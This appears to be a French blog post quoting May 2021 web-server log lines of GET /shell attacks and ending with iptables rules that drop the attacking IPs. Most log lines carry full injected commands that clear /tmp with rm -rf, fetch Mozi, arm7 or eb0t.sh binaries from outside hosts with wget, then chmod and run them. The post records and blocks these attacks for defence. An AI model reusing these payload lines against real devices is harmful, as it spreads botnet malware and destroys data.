Liste des IP qui font des attaques de type GET /shell

Voici la liste :

61.242.40.137 - - [31/May/2021:06:04:31 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
27.45.11.127 - - [31/May/2021:06:52:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://27.45.11.127:48083/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
209.141.33.232 - - [21/May/2021:03:57:39 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
182.121.231.1 - - [21/May/2021:04:07:59 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://182.121.231.1:59816/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
209.141.33.232 - - [21/May/2021:13:18:53 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [21/May/2021:14:34:29 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
223.149.149.208 - - [21/May/2021:22:16:38 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
103.203.72.91 - - [20/May/2021:06:12:05 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
119.123.236.177 - - [20/May/2021:15:52:53 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://119.123.236.177:38918/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
117.241.51.177 - - [18/May/2021:17:30:58 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.241.51.177:45448/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
27.5.37.175 - - [18/May/2021:19:41:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://27.5.37.175:46657/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
59.97.193.131 - - [17/May/2021:06:05:42 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.97.193.131:57363/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
138.204.132.98 - - [28/May/2021:20:03:35 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://212.192.241.127/eb0t.sh;chmod+777+/tmp/eb0t.sh;sh+/tmp/eb0t.sh" 400 0 "-" "-"
59.63.206.200 - - [26/May/2021:00:59:08 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://101.232.115.188:57082/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
114.33.156.230 - - [26/May/2021:09:57:41 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://114.33.156.230:59246/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
68.150.109.112 - - [26/May/2021:17:05:02 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 488 "-" "Hello, world"
209.141.33.232 - - [25/May/2021:02:00:39 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [24/May/2021:03:15:26 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [24/May/2021:05:17:24 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [23/May/2021:11:11:12 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [22/May/2021:12:33:25 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"

A noter que l’IP 45.14.149.244 est en Roumanie et 27.45.11.127 est en Chine.

Bilan :

iptables -A INPUT -s 45.14.149.244   -j DROP 
iptables -A INPUT -s 209.141.33.232   -j DROP
iptables -A INPUT -s 68.150.109.112    -j DROP 
iptables -A INPUT -s 114.33.156.230    -j DROP
iptables -A INPUT -s 59.63.206.200    -j DROP 
iptables -A INPUT -s 59.97.193.131    -j DROP
iptables -A INPUT -s 117.241.51.177    -j DROP
iptables -A INPUT -s 119.123.236.177     -j DROP
iptables -A INPUT -s 27.5.37.175    -j DROP
iptables -A INPUT -s 27.45.11.127    -j DROP
iptables -A INPUT -s 61.242.40.137     -j DROP
iptables -A INPUT -s 182.121.231.1      -j DROP
iptables-save > /etc/iptables/rules.v4

Misère.

CyberNeurones !

Sports, Informations locales, Open Source, Consom'acteur, Trekking.

Liste des IP qui font des attaques de type GET /shell

J’aime ça :

Laisser un commentaire Annuler la réponse